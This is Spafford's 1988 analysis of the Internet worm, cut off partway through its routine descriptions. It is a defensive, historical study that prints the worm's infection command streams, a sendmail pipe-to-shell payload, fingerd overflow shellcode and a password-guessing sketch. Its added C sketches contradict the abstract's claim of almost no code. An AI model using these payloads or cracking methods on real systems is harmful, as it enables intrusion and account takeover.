The Internet Worm Program: An Analysis, by Eugene H. Spafford



The Internet Worm Program: An Analysis

Purdue Technical Report CSD-TR-823

Eugene H. Spafford
Department of Computer Sciences
Purdue University
West Lafayette, IN 47907-2004
spaf@cs.purdue.edu
ABSTRACT

On the evening of 2 November 1988, someone infected the Internet with
a worm program.  That program exploited flaws in utility programs in
systems based on BSD-derived versions of UNIX.  The flaws allowed the
program to break into those machines and copy itself, thus infecting
those systems.  This infection eventually spread to thousands of
machines, and disrupted normal activities and Internet connectivity
for many days.  This report gives a detailed description of the
components of the worm program: data and functions.  It is based on
study of two completely independent reverse-compilations of the worm
and a version disassembled to VAX assembly language.  Almost no
source code is given in the paper because of current concerns about
the state of the ``immune system'' of Internet hosts, but the
description should be detailed enough to allow the reader to
understand the behavior of the program.  The paper contains a review
of the security flaws exploited by the worm program, and gives some
recommendations on how to eliminate or mitigate their future use.
The report also includes an analysis of the coding style and methods
used by the author(s) of the worm, and draws some conclusions about
his abilities and intent.
Copyright 1988 by Eugene H. Spafford.  All rights reserved.
Permission is hereby granted to make copies of this work, without
charge, solely for the purposes of instruction and research.  Any
such copies must include a copy of this title page and copyright
notice.  Any other reproduction, publication, or use is strictly
prohibited without express written permission.

November 29, 1988
1. Introduction

On the evening of 2 November 1988 the Internet came under attack from
within.  Sometime around 6 PM EST, a program was executed on one or
more hosts connected to the Internet.  This program collected host,
network, and user information, then broke into other machines using
flaws present in those systems' software.  After breaking in, the
program would replicate itself and the replica would also attempt to
infect other systems.  Although the program would only infect Sun
Microsystems Sun 3 systems and VAX computers running variants of
4 BSD UNIX, the program spread quickly, as did the confusion and
consternation of system administrators and users as they discovered
that their systems had been infected.  Although UNIX has long been
known to have some security weaknesses (cf. [Ritc79], [Gram84], and
[Reid87]), the scope of the break-ins came as a great surprise to
almost everyone.

The program was mysterious to users at sites where it appeared.
Unusual files were left in the /usr/tmp directories of some machines,
and strange messages appeared in the log files of some of the
utilities, such as the sendmail mail handling agent.  The most
noticeable effect, however, was that systems became more and more
loaded with running processes as they became repeatedly infected.  As
time went on, some of these machines became so loaded that they were
unable to continue any processing; some machines failed completely
when their swap space or process tables were exhausted.  By late
Wednesday night, personnel at the University of California at
Berkeley and at the Massachusetts Institute of Technology had
``captured'' copies of the program and began to analyze it.  People
at other sites also began to study the program and were developing
methods of eradicating it.  A common fear was that the program was
somehow tampering with system resources in a way that could not be
readily detected, and that while a cure was being sought, system
files were being altered or information destroyed.  By 5 AM EST
Thursday morning, less than 12 hours after the infection started on
the network, the Computer Systems Research Group at Berkeley had
developed an interim set of steps to halt its spread.  This included
a preliminary patch to the sendmail mail agent, and the suggestion to
rename one or both of the C compiler and loader to prevent their use.
These suggestions were published in mailing lists and on Usenet,
although their spread was hampered by systems disconnecting from the
Internet in an attempt at ``quarantine.''

By about 7 PM EST Thursday, another simple, effective method of
stopping the infection, without renaming system utilities, was
discovered at Purdue and also widely published.  Software patches
were posted by the Berkeley group at the same time to mend all the
flaws that enabled the program to invade systems.  All that remained
was to analyze the code that caused the problems.  On November 8, the
National Computer Security Center held a hastily convened workshop in
Baltimore.  The topic of discussion was the program and what it meant
to the Internet community.  Who was at that meeting, why they were
invited, and the topics discussed have not yet been made public.
However, one thing we do know is that those present at the meeting
decided not to distribute copies of their reverse-engineered code to
the general public.  It was felt that the program exploited too many
little-known techniques and that making it generally available would
only provide other attackers a framework to build another such
program.  Although such a stance is well-intended, it can serve only
as a delaying tactic.  As of November 27, I am aware of at least five
versions of the decompiled code, and because of the widespread
distribution of the binary, I am sure there are at least ten times
that many versions already completed or in progress.  The required
skills and tools are too readily available within the community to
believe that only a few groups have the capability to reconstruct the
source code.

Many system administrators, programmers, and managers are interested
in how the program managed to establish itself on their systems and
spread so quickly.  These individuals have a valid interest in seeing
the code, especially if they are software vendors.  Their interest is
not to duplicate the program, but to be sure that all the holes used
by the program are properly plugged.  Furthermore, examining the code
may help administrators and vendors develop defenses against future
attacks, despite the claims to the contrary by some of the
individuals with copies of the reverse-engineered code.  This report
is intended to serve an interim role in this process.  It is a
detailed description of how the program works, but does not provide
source code that could be used to create a new worm program.  As
such, this should be an aid to those individuals seeking a better
understanding of how the code worked, yet it is in such a form that
it cannot be used to create a new worm without considerable effort.
Section 3 and Appendix C contain specific observations about some of
the flaws in the system exploited by the program, and their fixes.  A
companion report, to be issued in a few weeks, will contain a history
of the worm's spread through the Internet.

This analysis is the result of a study performed on three separate
reverse-engineered versions of the worm code.  Two of these versions
are in C code, and one in VAX assembler.  All three agree in all but
the most minor details.  One C version of the code compiles to binary
that is identical to the original code, except for minor differences
of no significance.  As such, I can state with some certainty that if
there was only one version of the worm program, then it was benign in
intent.  The worm did not write to the file system except when
transferring itself into a target system.  It also did not transmit
any information from infected systems to any other site, other than
copies of the worm program itself.  Since the Berkeley Computer
Systems Research Group has already published official fixes to the
flaws exploited by the program, we do not have to worry about these
specific attacks being used again.  Many vendors have also issued
appropriate patches.  It now remains to convince the remaining
vendors to issue fixes, and users to install them.
2. Terminology

There seems to be considerable variation in the names applied to the
program described in this paper.  I use the term worm instead of
virus based on its behavior.  Members of the press have used the term
virus, possibly because their experience to date has been only with
that form of security problem.  This usage has been reinforced by
quotes from computer managers and programmers also unfamiliar with
the terminology.  For purposes of clarifying the terminology, let me
define the difference between these two terms and give some citations
to their origins:

A worm is a program that can run by itself and can propagate a fully
working version of itself to other machines.  It is derived from the
word tapeworm, a parasitic organism that lives inside a host and saps
its resources to maintain itself.

A virus is a piece of code that adds itself to other programs,
including operating systems.  It cannot run independently; it
requires that its ``host'' program be run to activate it.  As such,
it has a clear analog to biological viruses: those viruses are not
considered alive in the usual sense; instead, they invade host cells
and corrupt them, causing them to produce new viruses.

The program that was loosed on the Internet was clearly a worm.
2.1. Worms

The concept of a worm program that spreads itself from machine to
machine was apparently first described by John Brunner in 1975 in his
classic science fiction novel The Shockwave Rider. [Brun75]  He
called these programs tapeworms that lived ``inside'' the computers
and spread themselves to other machines.  In 1979-1981, researchers
at Xerox PARC built and experimented with worm programs.  They
reported their experiences in an article in 1982 in Communications of
the ACM. [Shoc82]  The worms built at PARC were designed to travel
from machine to machine and do useful work in a distributed
environment.  They were not used at that time to break into systems,
although some did ``get away'' during the tests.  A few people seem
to prefer to call the Internet Worm a virus because it was
destructive, and they believe worms are non-destructive.  Not
everyone agrees that the Internet Worm was destructive, however.
Since intent and effect are sometimes difficult to judge, using those
as a naming criterion is clearly insufficient.  As such, worm
continues to be the clear choice to describe this kind of program.
2.2. Viruses

The first use of the word virus (to my knowledge) to describe
something that infects a computer was by David Gerrold in his science
fiction short stories about the G.O.D. machine.  These stories were
later combined and expanded to form the book When Harlie Was One.
[Gerr72]  (A subplot in that book described a program named VIRUS
created by an unethical scientist.  A computer infected with VIRUS
would randomly dial the phone until it found another computer.  It
would then break into that system and infect it with a copy of VIRUS.
This program would infiltrate the system software and slow the system
down so much that it became unusable except to infect other
machines.)  The inventor had plans to sell a program named VACCINE
that could cure VIRUS and prevent infection, but disaster occurred
when noise on a phone line caused VIRUS to mutate so that VACCINE
ceased to be effective.

The term computer virus was first used in a formal way by Fred Cohen
at USC. [Cohe84]  He defined the term to mean a security problem that
attaches itself to other code and turns it into something that
produces viruses; to quote from his paper: ``We define a computer
`virus' as a program that can infect other programs by modifying them
to include a possibly evolved copy of itself.''  He claimed the first
computer virus was ``born'' on November 3, 1983, written by himself
for a security seminar course.

The interested reader may also wish to consult [Denn88] and [Dewd85]
for further discussion of the terms.
3. Flaws and Misfeatures

3.1. Specific Problems

The actions of the Internet Worm exposed some specific security flaws
in standard services provided by BSD-derived versions of UNIX.
Specific patches for these flaws have been widely circulated in the
days since the worm program attacked the Internet.  Those flaws and
patches are discussed here.
3.1.1. fingerd and gets

The finger program is a utility that allows users to obtain
information about other users.  It is usually used to identify the
full name or login name of a user, whether or not a user is currently
logged in, and possibly other information about the person such as
telephone numbers where he or she can be reached.  The fingerd
program is intended to run as a daemon, or background process, to
service remote requests using the finger protocol. [Harr77]

The bug exploited to break fingerd involved overrunning the buffer
the daemon used for input.  The standard C library has a few routines
that read input without checking for bounds on the buffer involved.
In particular, the gets call takes input to a buffer without doing
any bounds checking; this was the call exploited by the worm.  The
gets routine is not the only routine with this flaw.  The family of
routines scanf/fscanf/sscanf may also overrun buffers when decoding
input unless the user explicitly specifies limits on the number of
characters to be converted.  Incautious use of the sprintf routine
can overrun buffers.  Use of the strcat/strcpy calls instead of the
strncat/strncpy routines may also overflow their buffers.  Although
experienced C programmers are aware of the problems with these
routines, they continue to use them.  Worse, their format is in some
sense codified not only by historical inclusion in UNIX and the C
language, but more formally in the forthcoming ANSI language standard
for C.  The hazard with these calls is that any network server or
privileged program using them may possibly be compromised by careful
precalculation of inappropriate input.

An important step in removing this hazard would be first to develop a
set of replacement calls that accept values for bounds on their
program-supplied buffer arguments.  Next, all system servers and
privileged applications should be examined for unchecked uses of the
original calls, with those calls then being replaced by the new
bounded versions.  Note that this audit has already been performed by
the group at Berkeley; only the fingerd and timed servers used the
gets call, and patches to fingerd have already been posted.  Appendix
C contains a new version of fingerd written specifically for this
report that may be used to replace the original version.  This
version makes no calls to gets.
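As an illustration of what such a bounded replacement might look like
(a minimal sketch written for this report, not the code actually
distributed; the name bounded_gets and its interface are invented for
this example), a safe substitute for gets can be written in terms of
fgets:

    #include <stdio.h>
    #include <string.h>

    /* Hypothetical bounded replacement for gets(): reads at most
       size-1 characters into buf, strips any trailing newline, and
       returns NULL on end-of-file or error. */
    char *bounded_gets(char *buf, size_t size, FILE *fp)
    {
        if (fgets(buf, (int)size, fp) == NULL)
            return NULL;
        buf[strcspn(buf, "\n")] = '\0';   /* remove the newline */
        return buf;
    }

A server such as fingerd would then call bounded_gets(line, sizeof
line, stdin) and could never be made to write past the end of line,
no matter what a remote client sends.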
3.1.2. Sendmail

The sendmail program is a mailer designed to route mail in a
heterogeneous internetwork. [Allm83]  The program operates in a
number of modes, but the one of most interest is when it is operating
as a daemon process.  In this mode, the program is ``listening'' on a
TCP port (#25) for attempts to deliver mail using standard Internet
protocols, principally SMTP (Simple Mail Transfer Protocol). [Post82]
When such a request is detected, the daemon enters into a dialog with
the remote mailer to determine sender, recipient, delivery
instructions, and message contents.

The bug exploited in sendmail had to do with functionality provided
by a debugging option in the code.  The worm would issue the DEBUG
command to sendmail and then specify a set of commands instead of a
user address as the recipient of the message.  Normally, this is not
allowed, but it is present in the debugging code to allow testers to
verify that mail is arriving at a particular site without the need to
activate the address resolution routines.  The debug option of
sendmail is often used because of the complexity of configuring the
mailer for local conditions, and many vendors and site administrators
leave the debug option compiled in.

The sendmail program is of immense importance on most
Berkeley-derived (and other) UNIX systems because it handles the
complex tasks of mail routing and delivery.  Yet, despite its
importance and widespread use, most system administrators know little
about how it works.  Stories are often related about how system
administrators will attempt to write new device drivers or otherwise
modify the kernel of the OS, yet they will not willingly attempt to
modify sendmail or its configuration files.  It is little wonder,
then, that bugs are present in sendmail that allow unexpected
behavior.  Other flaws have been found and reported now that
attention has been focused on the program, but it is not known for
sure if all the bugs have been discovered and all the patches
circulated.  One obvious approach would be to dispose of sendmail and
come up with a simpler program to handle mail.  Actually, for
purposes of verification, developing a suite of cooperating programs
would be a better approach, and more aligned with the UNIX
philosophy.  In effect, sendmail is fundamentally flawed, not because
of anything related to function, but because it is too complex and
difficult to understand.

The Berkeley Computer Systems Research Group has a new version of
sendmail with many bug fixes and fixes for security flaws.  This
version of sendmail is available for FTP from the host
``ucbarpa.berkeley.edu'' and will be present in the file
~ftp/pub/sendmail.tar.Z by the end of November 1988.  Note that this
version is shipped with the DEBUG option disabled by default.
However, this does not help system administrators who wish to enable
the DEBUG option, although the researchers at Berkeley believe they
have fixed all the security flaws inherent in that facility.  One
approach that could be taken with the program would be to have it
prompt the user for the password of the super user (root) when the
DEBUG command is given.  A static password should never be compiled
into the program because this would mean that the same password might
be present at multiple sites and seldom changed.  For those sites
without access to FTP or otherwise unable to obtain the new version,
the official patches to sendmail are enclosed in Appendix D.
3.2. Other Problems

Although the worm exploited flaws in only two server programs, its
behavior has served to illustrate a few fundamental problems that
have not yet been widely addressed.  In the interest of promoting
better security, some of these problems are discussed here.  The
interested reader is directed to works such as [Gram84] for a broader
discussion of related issues.
3.2.1. Servers in general

A security flaw not exploited by the worm, but now becoming obvious,
is that many system services have configuration and command files
owned by the same userid.  Programs like sendmail, the at service,
and other facilities are often all owned by the same non-user id.
This means that if it is possible to abuse one of the services, it
might be possible to abuse many.  One way to deal with the general
problem is to have every daemon and subsystem run with a separate
userid.  That way, the command and data files for each subsystem
could be protected in such a way that only that subsystem could have
write (and perhaps read) access to the files.  This is effectively an
implementation of the principle of least privilege.  Although doing
this might add an extra dozen user ids to the system, it is a small
cost to pay, and is already supported in the UNIX paradigm.  Services
that should have separate ids include sendmail, news, at, finger,
ftp, uucp, and YP.
3.2.2. Passwords

A key attack of the worm program involved attempts to discover user
passwords.  It was able to determine success because the encrypted
password of each user was in a publicly readable file.  This allows
an attacker to encrypt lists of possible passwords and then compare
them against the actual passwords without passing through any system
function.  In effect, the security of the passwords is provided in
large part by the prohibitive effort of trying all combinations of
letters.  Unfortunately, as machines get faster, the cost of such
attempts decreases.  Dividing the task among multiple processors
further reduces the time needed to decrypt a password.  It is
currently feasible to use a supercomputer to precalculate all
probable passwords and store them on optical media.  Although not
(currently) portable, this scheme would allow someone with the
appropriate resources access to any account for which they could read
the password field: they need only consult their database of
pre-encrypted passwords.  As the density of storage media increases,
this problem will only get more severe.

A clear approach to reducing the risk of such attacks, and an
approach that has already been taken in some variants of UNIX, would
be to have a shadow password file.  The encrypted passwords are saved
in a file that is readable only by the system administrators, and a
privileged call performs password encryptions and comparisons with an
appropriate delay (.5 to 1 second, for instance).  This would prevent
any attempt to ``fish'' for passwords.  Additionally, a threshold
could be included to check for repeated password attempts from the
same process, resulting in some form of alarm being raised.  Shadow
password files should be used in combination with encryption rather
than in place of such techniques, however, or one problem is simply
replaced by a different one; the combination of the two methods is
stronger than either one alone.

Another way to strengthen the password mechanism would be to change
the utility that sets user passwords.  The utility currently makes
only a minimal attempt to ensure that new passwords are nontrivial to
guess.  The program could be strengthened in such a way that it would
reject any choice of a word currently in the on-line dictionary or
based on the account name.
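To make the exposure concrete, the following fragment (a hypothetical
sketch written for this report, not code from the worm) shows why a
readable encrypted password is dangerous: any guess can be checked
entirely offline with the standard crypt library routine, without
ever invoking a system login function.

    #include <unistd.h>   /* crypt() -- some systems use <crypt.h> */
    #include <string.h>

    /* "encrypted" is the 13-character password field from
       /etc/passwd; its first two characters are the salt.  Returns
       nonzero if the guess encrypts to the stored value. */
    int guess_matches(const char *guess, const char *encrypted)
    {
        char salt[3] = { encrypted[0], encrypted[1], '\0' };
        return strcmp(crypt(guess, salt), encrypted) == 0;
    }

A shadow password file defeats exactly this loop by denying the
attacker the encrypted string to compare against.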
4. High-Level Description of the Worm

This section contains a high-level overview of how the worm program
functions.  The description in this section assumes that the reader
is familiar with UNIX and somewhat familiar with network facilities
under UNIX.  Section 5 describes the individual functions and
structures in more detail.

The worm consists of two parts: a main program, and a bootstrap or
vector program (described in Appendix B).  We will start our
description from the point at which a host is about to be infected.
At this point, a worm running on another machine has either succeeded
in establishing a shell on the new host and has connected back to the
infecting machine via a TCP connection, or it has connected to the
SMTP port and is transmitting to the sendmail program.  The infection
proceeded as follows:
1)  A socket was established on the infecting machine for the vector
program to connect to (e.g., socket number 32341).  A challenge
string was constructed from a random number (e.g., 8712440).  A file
name base was also constructed using a random number (e.g.,
14481910).

2)  The vector program was installed and executed using one of two
methods:

2a)  Across a TCP connection to a shell, the worm would send the
following commands (the two lines beginning with ``cc'' were sent as
a single line):

    PATH=/bin:/usr/bin:/usr/ucb
    cd /usr/tmp
    echo gorch49;sed '/int zz/q' > x14481910.c;echo gorch50
    [text of vector program, enclosed in Appendix B]
    int zz;
    cc -o x14481910 x14481910.c;./x14481910 128.32.134.16 32341 8712440;
    rm -f x14481910 x14481910.c;echo DONE

Then it would wait for the string ``DONE'' to signal that the vector
program was running.

2b)  Using the SMTP connection, it would transmit (the two lines
beginning with ``cc'' were sent as a single line):

    debug
    mail from: </dev/null>
    rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
    data
    cd /usr/tmp
    cat > x14481910.c <<'EOF'
    [text of vector program, enclosed in Appendix B]
    EOF
    cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;
    rm -f x14481910 x14481910.c
    .
    quit
The infecting worm would then wait for up to 2 minutes on the
designated port for the vector to contact it.

3)  The vector program then connected to the ``server,'' sent the
challenge string, and transferred three files: a Sun 3 binary version
of the worm, a VAX version, and the source code for the vector
program.  After the files were copied, the running vector program
became (via the execl call) a shell with its input and output still
connected to the server worm.

4)  The server worm sent the following command stream to the
connected shell:

    PATH=/bin:/usr/bin:/usr/ucb
    rm -f sh
    if [ -f sh ]
    then P=x14481910
    else P=sh
    fi

Then, for each binary file it had transferred (just two in this case,
although the code is written to allow more), it would send the
following form of command sequence:

    cc -o $P x14481910,sun3.o
    ./$P -p $$ x14481910,sun3.o x14481910,vax.o x14481910,l1.c
    rm -f $P

The rm would succeed only if the linked version of the worm failed to
start execution.  If the server determined that the host was now
infected, it closed the connection.  Otherwise, it would try the
other binary file.  After both binary files had been tried, it would
send over rm commands for the object files to clear away all evidence
of the attempt at infection.

5)  The new worm on the infected host proceeded to ``hide'' itself by
obscuring its argument vector, unlinking the binary version of
itself, and killing its parent (the $$ argument in the invocation).
It then read each of the worm binary files into memory, encrypted
each file after reading it, and deleted the files from disk.
6)  Next, the new worm gathered information about network interfaces
and hosts to which the local machine was connected.  It built lists
of these in memory, including information about canonical and
alternate names and addresses.  It gathered some of this information
by making direct ioctl calls, and by running the netstat program with
various arguments.  It also read through various system files looking
for host names to add to its database.

7)  It randomized the lists it constructed, then attempted to infect
some of those hosts.  For directly connected networks, it created a
list of possible host numbers and attempted to infect those hosts if
they existed.  Depending on the type of host (gateway or local
network), the worm first tried to establish a connection on the
telnet or rexec ports to determine reachability before it attempted
one of the infection methods.

8)  The infection attempts proceeded by one of three routes: rsh,
fingerd, or sendmail.

8a)  The attack via rsh was done by attempting to spawn a remote
shell by invocation of (in order of trial) /usr/ucb/rsh,
/usr/bin/rsh, and /bin/rsh.  If successful, the host was infected as
in steps 1 and 2a, above.

8b)  The attack via the finger daemon was somewhat more subtle.  A
connection was established to the remote finger server daemon and
then a specially constructed string of 536 bytes was passed to the
daemon, overflowing its input buffer and overwriting parts of the
stack.  For standard 4 BSD versions running on VAX computers, the
overflow resulted in the return stack frame for the main routine
being changed so that the return address pointed into the buffer on
the stack.  The instructions that were written into the stack at that
location were:

    pushl   $68732f     '/sh\0'
    pushl   $6e69622f   '/bin'
    movl    sp, r10
    pushl   $0
    pushl   $0
    pushl   r10
    pushl   $3
    movl    sp, ap
    chmk    $3b

That is, the code executed when the main routine attempted to return
was:

    execve("/bin/sh", 0, 0)

On VAXen, this resulted in the worm connected to a remote shell via
the TCP connection.  The worm then proceeded to infect the host as in
steps 1 and 2a, above.  On Suns, this simply resulted in a core file
since the code was not in place to corrupt a Sun version of fingerd
in a similar fashion.

8c)  The worm then tried to infect the remote host by establishing a
connection to the SMTP port and mailing an infection, as in step 2b,
above.

Not all the steps were attempted.  As soon as one method succeeded,
the host entry in the internal list was marked as infected and the
other methods were not attempted.

9)  Next, it entered a state machine consisting of five states.  Each
state was run for a short while, then the program looped back to step
7 (attempting to break into other hosts via sendmail, finger, or
rsh).  The first four of the five states were attempts to break into
user accounts on the local machine.  The fifth state was the final
state, and occurred after all attempts had been made to break all
passwords.  In the fifth state, the worm looped forever trying to
infect hosts in its internal tables that were marked as not yet
infected.  The four states were:
9a)  The worm read through the /etc/hosts.equiv and /.rhosts files to
find the names of equivalent hosts.  These were marked in the
internal table of hosts.  Next, the worm read the /etc/passwd file
into an internal data structure.  As it was doing this, it also
examined the .forward file in each user home directory and included
those host names in its internal table of hosts to try.  Oddly, it
did not similarly check user .rhosts files.

9b)  The worm attempted to break each user password using simple
choices.  The worm checked the obvious case of no password.  Then, it
used the account name and GECOS field to try simple passwords.
Assume that the user had an entry in the password file like:

    account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh

Then the words tried as potential passwords would be account,
accountaccount, User, Name, user, name, and tnuocca.  These are,
respectively, the account name, the account name concatenated with
itself, the first and last names of the user, those names with
leading capital letters turned to lower case, and the account name
reversed (see the sketch at the end of this section).  Experience
described in [Gram84] indicates that on systems where users are naive
about password security, these choices may work for up to 30% of user
passwords.  Step 10 in this section describes what was done if a
password ``hit'' was achieved.

9c)  The third stage in the process involved trying to break the
password of each user by trying each word present in an internal
dictionary of words (see Appendix A).  This dictionary of 432 words
was tried against each account in a random order, with ``hits'' being
handled as described in step 10, below.

9d)  The fourth stage was entered if all other attempts failed.  For
each word in the file /usr/dict/words, the worm would see if it was
the password to any account.  In addition, if the word in the
dictionary began with an upper case letter, the letter was converted
to lower case and that word was also tried against all the passwords.

10)  Once a password was broken for any account, the worm would
attempt to break into remote machines where that user had accounts.
The worm would scan the .forward and .rhosts files of the user at
this point, and identify the names of remote hosts that had accounts
used by the target user.  It then attempted two attacks:

10a)  The worm would first attempt to create a remote shell using the
rexec service.  The attempt would be made using the account name
given in the .forward or .rhosts file and the user's local password.
This took advantage of the fact that users often have the same
password on their accounts on multiple machines.

10b)  The worm would do a rexec to the current host (using the local
user name and password) and would try an rsh command to the remote
host using the username taken from the file.  This attack would
succeed in those cases where the remote machine had a hosts.equiv
file or the user had a .rhosts file that allowed remote execution
without a password.

If the remote shell was created either way, the attack would continue
as in steps 1 and 2a, above.  No other use was made of the user
password.

Throughout the execution of the main loop, the worm would check for
other worms running on the same machine.  To do this, the worm would
attempt to connect to another worm on a local, predetermined TCP
socket.
If such a connection succeeded, one worm would (randomly) set its
pleasequit variable to 1, causing that worm to exit after it had
reached partway into the third stage of password cracking.  This
delay is part of the reason many systems had multiple worms running:
even though a worm would check for other local worms, it would defer
its self-destruction until significant effort had been made to break
local passwords.  One out of every seven worms would become immortal
rather than check for other local worms.  This was probably done to
defeat any attempt to put a fake worm process on the TCP port to kill
existing worms.  It also contributed to the load of a machine once
infected.

The worm attempted to send a UDP packet to the host ernie.berkeley.edu
approximately once every 15 infections, based on a random number
comparison.  The code to do this was incorrect, however, and no
information was ever sent.  Whether this was an intended ruse or
whether there was actually some reason for the byte to be sent is not
currently known.  However, the code is such that an uninitialized
byte is the intended message.  It is possible that the author
eventually intended to run some monitoring program on ernie (after
breaking into an account, no doubt).  Such a program could obtain the
sending host number from the single-byte message, whether it was sent
as a TCP or UDP packet.  However, no evidence for such a program has
been found and it is possible that the connection was simply a feint
to cast suspicion on personnel at Berkeley.

The worm would also fork itself on a regular basis and kill its
parent.  This served two purposes.  First, the worm appeared to keep
changing its process id, and no single process accumulated excessive
amounts of CPU time.  Second, processes that have been running for a
long time have their priority downgraded by the scheduler.  By
forking, the new process would regain normal scheduling priority.
This mechanism did not always work correctly, either, as we locally
observed some instances of the worm with over 600 seconds of
accumulated CPU time.

If the worm ran for more than 12 hours, it would flush its host list
of all entries flagged as being immune or already infected.  The way
hosts were added to this list implies that a single worm might
reinfect the same machines every 12 hours.
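The sketch below (hypothetical C written for this report; the helper
name build_guesses and the output format are invented, not taken from
the worm) makes step 9b concrete by generating the candidate list for
the example password file entry given there:

    #include <stdio.h>
    #include <string.h>
    #include <ctype.h>

    /* Print the step-9b guesses for one account.  The gecos
       argument is assumed to hold "First, Last" as in the example
       /etc/passwd entry in the text. */
    void build_guesses(const char *account, const char *gecos)
    {
        char buf[128], first[64], last[64];
        size_t i, n = strlen(account);

        printf("%s\n", account);                /* account name */
        snprintf(buf, sizeof buf, "%s%s", account, account);
        printf("%s\n", buf);                    /* name doubled */

        if (sscanf(gecos, "%63[^,], %63s", first, last) == 2) {
            printf("%s\n%s\n", first, last);    /* first and last */
            first[0] = tolower((unsigned char)first[0]);
            last[0] = tolower((unsigned char)last[0]);
            printf("%s\n%s\n", first, last);    /* lower-cased */
        }
        for (i = 0; i < n; i++)                 /* reversed name */
            buf[i] = account[n - 1 - i];
        buf[n] = '\0';
        printf("%s\n", buf);
    }

    int main(void)
    {
        build_guesses("account", "User, Name");
        return 0;
    }

Run against the entry shown in step 9b, this prints account,
accountaccount, User, Name, user, name, and tnuocca: exactly the
seven guesses the worm tried before moving on to its internal
dictionary.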
5. A Tour of the Worm

The following is a brief, high-level description of the routines
present in the worm code.  The description covers all the significant
functionality of the program, but does not describe all the auxiliary
routines used, nor does it describe all the parameters or algorithms
involved.  It should, however, give the reader a complete view of how
the worm functioned.
5.1. Data Structures

The worm had a few global data structures worth mentioning.
Additionally, the way it handled some local data is of interest.

5.1.1. Host list

The worm constructed a linked list of host records.  Each record
contained an array of 12 character pointers to allow storage of up to
12 host names/aliases.  Each record also contained an array of six
long unsigned integers for host addresses, and each record contained
a flag field.  The only flag bits used in the code appear to be 0x01
(host was a gateway), 0x02 (host has been infected), 0x04 (host
cannot be infected: not reachable, not UNIX, wrong machine type), and
0x08 (host was ``equivalent'' in the sense that it appeared in a
context like a .rhosts file).
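A hypothetical C rendering of such a record (the type and field names
here are invented for illustration; the worm's own declarations are
not reproduced in this report) might look like:

    /* Flag bits, as described above. */
    #define HF_GATEWAY   0x01   /* host was a gateway             */
    #define HF_INFECTED  0x02   /* host has been infected         */
    #define HF_IMMUNE    0x04   /* unreachable, non-UNIX, or
                                   wrong machine type             */
    #define HF_EQUIV     0x08   /* seen in a .rhosts-like context */

    struct host {
        char          *names[12];   /* canonical name and aliases */
        unsigned long  addrs[6];    /* host addresses             */
        int            flags;       /* HF_* bits above            */
        struct host   *next;        /* link to the next record    */
    };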
5.1.2. Gateway List

The worm constructed a simple array of gateway IP addresses through
the use of the system netstat command.  These addresses were used to
infect directly connected networks.  The use of the list is described
in the explanation of scan_gateways and rt_init, below.

5.1.3. Interfaces list

An array of records was filled in with information about each network
interface active on the current host.  This included the name of the
interface, the outgoing address, the netmask, the destination host if
the link was point-to-point, and the interface flags.

5.1.4. Pwd

A linked list of records was built to hold user information.  Each
structure held the account name, the encrypted password, the home
directory, the gecos field, and a link to the next record.  A blank
field was also allocated for decrypted passwords as they were found.
5.1.5. Objects

The program maintained an array of ``objects'' that held the files
that composed the worm.  Rather than have the files stored on disk,
the program read the files into these internal structures.  Each
record in the list contained the suffix of the file name (e.g.,
``sun3.o''), the size of the file, and the encrypted contents of the
file.  The use of this structure is described below.

5.1.6. Words

A mini-dictionary of words was present in the worm to use in password
guessing (see Appendix A).  The words were stored in an array, and
every word was masked (XOR) with the bit pattern 0x80.  Thus, the
dictionary would not show up with an invocation of the strings
program on the binary or object files.

5.1.7. Embedded Strings

Every text string used by the program, without exception, was masked
(XOR) with the bit pattern 0x81.  Every time a string was referenced,
it was referenced via a call to XS.  The XS function decrypted the
requested string in a static circular buffer and returned a pointer
to the decrypted version.  This also kept any of the text strings in
the program from appearing during an invocation of strings.  Simply
clearing the high order bit (e.g., XOR 0x80) or displaying the
program binary would not produce intelligible text.  All references
to XS have been omitted from the following text; realize that every
string was so encrypted.

It is not evident how the strings were placed in the program in this
manner.  The masked strings were present inline in the code, so some
preprocessor or a modified version of the compiler must have been
used.  This represents a significant effort by the author of the
worm, and suggests quite strongly that the author wanted to
complicate or prevent the analysis of the program once it was
discovered.
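The following fragment (a minimal sketch written for this report, not
the worm's own XS routine) illustrates the masking technique.
Because XOR is its own inverse, a single routine both hides and
reveals a string; the routine is named here after the worm's xorbuf
listed below, though the real routine's interface is not known to
match:

    #include <stdio.h>

    /* XOR every byte of a NUL-terminated string with a mask.
       Applying the same mask twice restores the original text. */
    void xorbuf(char *s, unsigned char mask)
    {
        for (; *s; s++)
            *s ^= mask;
    }

    int main(void)
    {
        char msg[] = "/etc/passwd";
        xorbuf(msg, 0x81);    /* masked: invisible to strings(1) */
        xorbuf(msg, 0x81);    /* unmasked again */
        printf("%s\n", msg);
        return 0;
    }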
5.2. Routines

The descriptions given here are arranged in alphabetic order.  The
names of some routines are exactly as used by the author of the code.
Other names are based on the function of the routine; those names
were chosen because the original routines were declared static and
name information was not present in the object files.  If the reader
wishes to trace the functional flow of the worm, begin with the
descriptions of routines main and doit (presented first for this
reason).  By function, the routines can be (arbitrarily) grouped as
follows:

setup and utility: main, doit, crypt, h_addaddr, h_addname,
h_addr2host, h_clean, h_name2host, if_init, loadobject, makemagic,
netmaskfor, permute, rt_init, supports_rsh, and supports_telnet.

network & password attacks: attack_network, attack_user, crack_0,
crack_1, crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect,
scan_gateways, sendworm, try_fingerd, try_password, try_rsh,
try_sendmail, and waithit.

camouflage: checkother, other_sleep, send_message, and xorbuf.
5.2.1. main

This was where the program started.  The first thing it did was
change its argument vector to make it look like it was the shell
running.  Next, it set its resource limits so a failure would not
drop a core file.  Then it loaded all the files named on the command
line into the object structure in memory using calls to loadobject.
If a file was not one of the objects loaded, the worm would
immediately call exit.  Next, the code unlinked all the object files,
the file named sh (the worm itself), and the file /tmp/.dumb
(apparently a remnant of some earlier version of the program,
possibly used as a restraint or log during testing; the file is not
otherwise referenced).  The program then finished zeroing out the
argument vector.

Next, the code would call if_init.  If no interfaces were discovered
by that routine, the program would call exit.  The program would then
get its current process group.  If the process group was the same as
its parent process id (passed on the command line), it would reset
its process group and send a KILL signal to its parent.  Last of all,
the routine doit was invoked.
5.2.2. doit

This was the main worm code.  First, a variable was set to the
current time with a call to time, and the random number generator was
initialized with the return value.  Next, the routines hg and hl were
invoked to infect some hosts.  If one or both of these failed to
infect any hosts, the routine ha was invoked.  Next, the routine
checkother was called to see if other worms were on this host.  The
